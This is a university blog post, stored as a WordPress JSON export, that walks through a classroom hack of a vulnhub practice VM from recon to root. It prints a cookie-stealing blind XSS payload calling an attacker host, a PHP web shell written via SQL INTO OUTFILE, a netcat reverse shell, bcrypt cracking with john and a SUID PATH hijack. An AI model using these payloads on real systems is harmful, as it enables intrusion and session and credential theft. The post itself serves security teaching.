{"id":10939,"date":"2020-09-11T16:39:52","date_gmt":"2020-09-11T14:39:52","guid":{"rendered":"https:\/\/blog.mi.hdm-stuttgart.de\/?p=10939"},"modified":"2020-09-11T17:07:39","modified_gmt":"2020-09-11T15:07:39","slug":"how-are-vulnerabilities-exploited-to-compromise-a-system","status":"publish","type":"post","link":"https:\/\/blog.mi.hdm-stuttgart.de\/index.php\/2020\/09\/11\/how-are-vulnerabilities-exploited-to-compromise-a-system\/","title":{"rendered":"How are vulnerabilities exploited to compromise a system?"},"content":{"rendered":"\n<p><em>This article is a recap of the &#8220;Live Hack&#8221; presentation, held in the lecture &#8220;Sichere Systeme&#8221; in SS 2020. It introduces different vulnerabilities like XSS and SQL-Injection and shows how passwords can be cracked under certain circumstances. The last step explains how a SUID binary was exploited to gain root access on the target system.<\/em><\/p>\n\n\n\n<!--more-->\n\n\n\n<p class=\"has-large-font-size\">Introduction<\/p>\n\n\n\n<p>The goal of the Live Hack presentation was to show how different vulnerabilities can be exploited to compromise a system, with the ultimate goal of gaining root access. For that, a suitable VM from vulnhub.com was selected. Vulnhub is a website that provides materials for users to gain &#8220;hands-on&#8221; experience in the field of cyber security. The VM &#8220;Credit Card Scammers: 1&#8221; was chosen for its realistic and interesting vulnerabilities. The presentation was structured with an agenda inspired by the Cyber Kill Chain and explained different stages of a cyber attack with practical &#8220;hands-on&#8221; examples on the target VM. 
The stages used were:<\/p>\n\n\n\n<ul class=\"wp-block-list\"><li>Recon<\/li><li>Weaponization<\/li><li>Deliver<\/li><li>Exploitation<\/li><li>Privilege Escalation<\/li><\/ul>\n\n\n\n<p>The Privilege Escalation stage itself again includes Recon, Weaponization, Deliver and Exploitation stages.<\/p>\n\n\n\n<p class=\"has-large-font-size\">Recon<\/p>\n\n\n\n<p>The mission in the first stage was to get as much information about the target as possible. This information can later be used to identify vulnerabilities which might be used to get the first access to the system. Gathering information is not limited to technical information like IP addresses, open ports, domain names, etc. In a real-world scenario, valuable information also includes information about employees, which could be found on social media among other things. As the scope of this target was a single VM with one IP address, the first thing done was a scan with the network tool Nmap, which can be used to discover open ports, the target operating system and much more. 
The result of the command below has been shortened to show only what is important in this case.<\/p>\n\n\n\n<p class=\"has-normal-font-size\"><code class=\"\" data-line=\"\"># nmap -sS -sV -O -p- -oN nmap_result.txt &lt;victim-ip&gt;<br>    22\/tcp open ssh   OpenSSH 8.0 (protocol 2.0)<br>    80\/tcp open http  Apache httpd 2.4.37 ((centos))<br>    Aggressive OS guesses: Linux 3.10 - 4.11 (97%), Linux 3.2 - 4.9 (96%), ...<br>    1 IP address (1 host up) scanned in 237.94 seconds<\/code><\/p>\n\n\n\n<p class=\"has-normal-font-size\">Command options: <br><code class=\"\" data-line=\"\">-sS<\/code>      TCP SYN scan<br><code class=\"\" data-line=\"\">-sV<\/code>      tries to gather information about services running on open ports<br><code class=\"\" data-line=\"\">-O<\/code>         enable OS detection<br><code class=\"\" data-line=\"\">-p-<\/code>      scan all ports<br><code class=\"\" data-line=\"\">-oN<\/code>      output scan in normal text to file.<\/p>\n\n\n\n<p>The output shows two running services on ports 22 and 80, which were identified by Nmap to be SSH and an Apache webserver. With this information we browsed the webserver and discovered a website running a little shop, where we continued gathering information. To discover files \/ URLs accessible on a server, tools like Dirbuster or Gobuster can be used. They both take a wordlist for a brute-force approach. With Gobuster we discovered an interesting \/_admin\/ directory where we could find a login page. 
As we had no valid credentials, we could not get any further yet.<\/p>\n\n\n\n<div class=\"wp-block-group\"><div class=\"wp-block-group__inner-container is-layout-flow wp-block-group-is-layout-flow\">\n<p><code class=\"\" data-line=\"\"># gobuster dir -u http:\/\/&lt;victim-ip&gt;\/ -w \/usr\/share\/wordlists\/seclists\/common.txt &gt; directories.txt<\/code><\/p>\n<\/div><\/div>\n\n\n\n<p>Command options:<br><code class=\"\" data-line=\"\">dir<\/code>    do a directory scan<br><code class=\"\" data-line=\"\">-u<\/code>        specifies the URL<br><code class=\"\" data-line=\"\">-w<\/code>        specifies the wordlist<\/p>\n\n\n\n<p>We continued to browse the website and found a checkout page where users must input their information to complete an order. User inputs of any kind are generally an interesting point in an application as they might be abused by attackers. We found out that the inputs are vulnerable to blind XSS attacks. <\/p>\n\n\n\n<div class=\"wp-block-group\"><div class=\"wp-block-group__inner-container is-layout-flow wp-block-group-is-layout-flow\">\n<p class=\"has-background\" style=\"font-size:clamp(14px, 0.875rem + ((1vw - 3.2px) * 0.073), 15px);px;background-color:#dde2e6\">Blind XSS:<br>We expect our input to be shown somewhere else (this can also be another application) that is vulnerable to XSS attacks. For example, if an application has an admin panel that shows failed login attempts, we could try to inject an XSS payload within the username or password, which could be shown in the admin panel that might run the XSS payload. 
Injection points are not limited to input fields; one could also use headers like the user agent, referer or even cookie values.<br>XSS Hunter is a tool which can be used to spray multiple payloads on different injection points, and if one is successful it sends a notification via Slack or e-mail.<\/p>\n<\/div><\/div>\n\n\n\n<p>To find the blind XSS vector, we used the payload<\/p>\n\n\n\n<p><code class=\"\" data-line=\"\">&lt;script&gt;var img = document.createElement(&#039;img&#039;); img.src=&#039;http:\/\/&lt;attacker-ip&gt;\/&#039;;document.body.appendChild(img);&lt;\/script&gt;<\/code><\/p>\n\n\n\n<p>in one of the input fields and started a simple listener on our host machine:<\/p>\n\n\n\n<p><code class=\"\" data-line=\"\"># python -m SimpleHTTPServer 80<\/code><\/p>\n\n\n\n<p>The payload queries an image from our server, and when the browser tries to load it, we see an incoming request in our Python server logs.<\/p>\n\n\n\n<p class=\"has-large-font-size\">Weaponization, Deliver and Exploitation<\/p>\n\n\n\n<p>We found enough information in our previous stage and were ready to exploit the XSS vulnerability we found. For that we created a new payload which tries to read the cookies from the user and send those to our Python server inside the URL:<\/p>\n\n\n\n<p><code class=\"\" data-line=\"\">&lt;script&gt;var img = document.createElement(&#039;img&#039;); img.src=&#039;http:\/\/&lt;attacker-ip&gt;\/&#039;+document.cookie;document.body.appendChild(img);&lt;\/script&gt;<\/code><\/p>\n\n\n\n<p>When the blind XSS payload got triggered, our Python server showed the following output:<\/p>\n\n\n\n<p><code class=\"\" data-line=\"\">10.0.2.13 - - [10\/Sep\/2020 14:05:28] code 404, message File not found<br>10.0.2.13 - - [10\/Sep\/2020 14:05:28] &quot;GET \/PHPSESSID=kissbhk54cu30ipa2c0l7k1ch6 HTTP\/1.1&quot; 404 -<\/code><\/p>\n\n\n\n<p>The requested URL contains a PHP session cookie! Because JavaScript could read it, the cookie was evidently set without the HttpOnly flag. 
<\/p>\n\n\n\n<p>Next we added the cookie in our browser for the website we found on the target VM and again browsed the \/_admin\/ section. This time we were redirected to an admin panel and not asked to provide a username and password. This is because we had a valid session cookie which we stole from the user who browsed a site that triggered our XSS payload. The admin panel showed all orders, including our order, which contained our XSS payload. An admin must have checked the orders, and in the background the browser executed our payload that sent us the admin&#8217;s cookie. Our next step was again to gather information to find a way to escalate our privileges.<\/p>\n\n\n\n<p class=\"has-large-font-size\">SQL-Injection<\/p>\n\n\n\n<p>Within the admin panel we found a functionality that allows executing SQL statements. As it was intended for entering SQL, it is not really a SQL-Injection, but it is quite similar. Its description was: <em>&#8220;This page allows you to execute SQL commands for deleting and archiving data.&#8221;<\/em> As SQL can be used to write files to the machine and the description said something about archiving data, our next try was to create a file on the server. For that we used the following SQL command:<\/p>\n\n\n\n<p><code class=\"\" data-line=\"\">SELECT &quot;test&quot; INTO OUTFILE &#039;\/var\/www\/html\/test.php&#039;<\/code><\/p>\n\n\n\n<p>If successful, the command creates a file named <code class=\"\" data-line=\"\">test.php<\/code> with the content &#8220;test&#8221; in the <code class=\"\" data-line=\"\">\/var\/www\/html\/<\/code> directory. We chose <code class=\"\" data-line=\"\">\/var\/www\/html<\/code> as the directory because it is the default webroot for Apache servers. After we ran the command we browsed to the file and saw that it worked, as the browser showed the response &#8220;test&#8221;. For this to work, the database account needs the FILE privilege, the server&#8217;s <code class=\"\" data-line=\"\">secure_file_priv<\/code> setting must allow the target directory, and the database process must be able to write to the webroot. We were now ready to prepare a new payload, deliver it and exploit the functionality. 
As we knew the server was running PHP, we created a PHP script that lets us execute system commands on the target. <\/p>\n\n\n\n<p><code class=\"\" data-line=\"\">SELECT &quot;&lt;?php system($_GET[&#039;cmd&#039;]); ?&gt;&quot; INTO OUTFILE &#039;\/var\/www\/html\/shell.php&#039;<\/code><\/p>\n\n\n\n<p>The PHP script extracts the <code class=\"\" data-line=\"\">GET<\/code> parameter <code class=\"\" data-line=\"\">cmd<\/code> and executes its value as a system command. With that we already had shell access on the server, but it was limited to the privileges of the user (<code class=\"\" data-line=\"\">www<\/code>) that runs the webserver, and it is cumbersome to execute commands via the browser. Because of that we entered a command that opens a reverse shell for us. For that we used the command line tool <code class=\"\" data-line=\"\">nc<\/code>. The <code class=\"\" data-line=\"\">-e<\/code> option lets us start a bash process and relays its input and output to the connected peer.<\/p>\n\n\n\n<p><code class=\"\" data-line=\"\"># nc 192.168.100.113 4444 -e \/bin\/bash<\/code><\/p>\n\n\n\n<p>Before running that command we started a listener that can then use the bash program over the <code class=\"\" data-line=\"\">nc<\/code> connection:<\/p>\n\n\n\n<p><code class=\"\" data-line=\"\"># nc -lvnp 4444<\/code><\/p>\n\n\n\n<p>As no request was received by our listener, we guessed that a firewall might block uncommon ports and switched from port <code class=\"\" data-line=\"\">4444<\/code> to port <code class=\"\" data-line=\"\">53<\/code>, which is used for DNS queries. With the new port our listener could receive the request and we now had a shell on the target machine.<\/p>\n\n\n\n<p class=\"has-large-font-size\">Password extraction and cracking<\/p>\n\n\n\n<p>Next we again needed to do some information gathering to find the next attack vector. 
As we had used a SQL-Injection previously, it might be interesting to read the content of the tables, as we might be able to extract important information. As the <code class=\"\" data-line=\"\">mysql<\/code> command needed a password for authentication, we took a closer look around the webserver files and found a configuration file that was used by the PHP application to connect to the database. As we now had a username and password, we could inspect all tables. We decided to take a closer look at the user table and found usernames and hashed passwords. As one username (moneygrabber) was the same as a user on the target machine, we next tried to crack his password hash, as the user might use the same password. For that we first checked the hash type:<\/p>\n\n\n\n<p><code class=\"\" data-line=\"\"># cat hash.txt | hashid<br>[+] Blowfish(OpenBSD)<br>[+] Woltlab Burning Board 4.x<br>[+] bcrypt<\/code><\/p>\n\n\n\n<p>which showed that it probably was a bcrypt hash. If the user uses a weak password we might still be able to crack it. For that we used john and a preselected wordlist.<\/p>\n\n\n\n<p><code class=\"\" data-line=\"\"># john --format=bcrypt --wordlist=.\/wordlist.txt .\/hash.txt<\/code><\/p>\n\n\n\n<p>The command line tool <code class=\"\" data-line=\"\">john<\/code> tries every password in the wordlist and found the password to be &#8220;delta1&#8221;. Note that this was only possible because the user used a weak password which was included in our wordlist. Next we tried to switch to the user moneygrabber with the given password, which worked! To have proper shell access we used the SSH service to get our next shell on the server (user moneygrabber and password delta1). 
Now we were in the final recon phase and needed to find another way to escalate our privileges again.<\/p>\n\n\n\n<p class=\"has-large-font-size\">SUID Exploitation<\/p>\n\n\n\n<p>After looking for ways to escalate our privileges we found a SUID binary which runs as root and could be executed by our user. To find all SUID binaries owned by root on a system, the following command can be used:<\/p>\n\n\n\n<p><code class=\"\" data-line=\"\"># find \/ -user root -perm -4000 -exec ls -ldb {} \\; &gt; \/tmp\/suids<\/code><\/p>\n\n\n\n<p>This command finds all root-owned SUID binaries and writes them to the output file <code class=\"\" data-line=\"\">\/tmp\/suids<\/code>. Among the listed binaries we found a suspicious binary <code class=\"\" data-line=\"\">\/usr\/bin\/backup<\/code>, which seems to create some backups. For further investigation we inspected the binary with the strings command to extract all human-readable strings:<\/p>\n\n\n\n<p><code class=\"\" data-line=\"\"># strings \/usr\/bin\/backup<\/code><\/p>\n\n\n\n<p>The output showed many strings and contained: <code class=\"\" data-line=\"\">\/home\/moneygrabber\/backup.sh<\/code>. It seems like the binary calls that script. Unfortunately we do not have write privileges on that script, so we can&#8217;t modify it to execute our code. The script contained the following:<\/p>\n\n\n\n<p><code class=\"\" data-line=\"\"># cat \/home\/moneygrabber\/backup.sh<br>    #!\/bin\/bash<br>    tar -cf mysql.tar \/var\/lib\/mysql<br>    sleep 30<\/code><\/p>\n\n\n\n<p>Notably, the script executes the tar command but does not specify the full file path to it. 
Because our own <code class=\"\" data-line=\"\">PATH<\/code> variable is used when we execute the SUID binary, we can create our own <code class=\"\" data-line=\"\">tar<\/code> script and add its directory to the <code class=\"\" data-line=\"\">PATH<\/code> variable so that it gets found before the real <code class=\"\" data-line=\"\">tar<\/code> command; the SUID binary should then execute our script. The script we created only executed bash to open a new shell session. Next we needed to add <code class=\"\" data-line=\"\">\/home\/moneygrabber<\/code> at the beginning of the <code class=\"\" data-line=\"\">PATH<\/code> variable, as this was the location of our script.<\/p>\n\n\n\n<p><code class=\"\" data-line=\"\"># export PATH=&quot;\/home\/moneygrabber:$PATH&quot;<\/code><\/p>\n\n\n\n<p>When we now run the SUID binary it executes the <code class=\"\" data-line=\"\">backup.sh<\/code> script, which executes our <code class=\"\" data-line=\"\">tar<\/code> script that opens a new shell session. That shell session runs as user root as it was opened by the SUID binary. With that we successfully gained root privileges on the server!<\/p>\n","protected":false},"excerpt":{"rendered":"<p>This article is a recap of the &#8220;Live Hack&#8221; presentation, held in the lecture &#8220;Sichere Systeme&#8221; in SS 2020. It introduces different vulnerabilities like XSS and SQL-Injection and shows how passwords can be cracked under certain circumstances. 
The last step explains how a SUID binary was exploited to gain root access on the target system.<\/p>\n","protected":false},"author":1011,"featured_media":0,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_jetpack_memberships_contains_paid_content":false,"footnotes":""},"categories":[26],"tags":[],"ppma_author":[819],"class_list":["post-10939","post","type-post","status-publish","format-standard","hentry","category-secure-systems"],"aioseo_notices":[],"jetpack_featured_media_url":"","jetpack-related-posts":[],"jetpack_sharing_enabled":true,"authors":[{"term_id":819,"user_id":1011,"is_guest":0,"slug":"jb238","display_name":"Joel Beiter","avatar_url":"https:\/\/secure.gravatar.com\/avatar\/c0defa9229d07dfee323b399c4efa67113c392025962b75591b268157c55d419?s=96&d=mm&r=g","0":null,"1":"","2":"","3":"","4":"","5":"","6":"","7":"","8":""}],"_links":{"self":[{"href":"https:\/\/blog.mi.hdm-stuttgart.de\/index.php\/wp-json\/wp\/v2\/posts\/10939","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/blog.mi.hdm-stuttgart.de\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/blog.mi.hdm-stuttgart.de\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/blog.mi.hdm-stuttgart.de\/index.php\/wp-json\/wp\/v2\/users\/1011"}],"replies":[{"embeddable":true,"href":"https:\/\/blog.mi.hdm-stuttgart.de\/index.php\/wp-json\/wp\/v2\/comments?post=10939"}],"version-history":[{"count":27,"href":"https:\/\/blog.mi.hdm-stuttgart.de\/index.php\/wp-json\/wp\/v2\/posts\/10939\/revisions"}],"predecessor-version":[{"id":11126,"href":"https:\/\/blog.mi.hdm-stuttgart.de\/index.php\/wp-json\/wp\/v2\/posts\/10939\/revisions\/11126"}],"wp:attachment":[{"href":"https:\/\/blog.mi.hdm-stuttgart.de\/index.php\/wp-json\/wp\/v2\/media?parent=10939"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/blog.mi.hdm-stuttgart.de\/index.php\/wp-json\/wp\/v2\/categories?post=10939"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/blog.mi.hdm-stuttgart.de\/index.php\/wp-json\/wp\/v2\/tags?post=10939"},{"taxonomy":"author","embeddable":true,"href":"https:\/\/blog.mi.hdm-stuttgart.de\/index.php\/wp-json\/wp\/v2\/ppma_author?post=10939"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}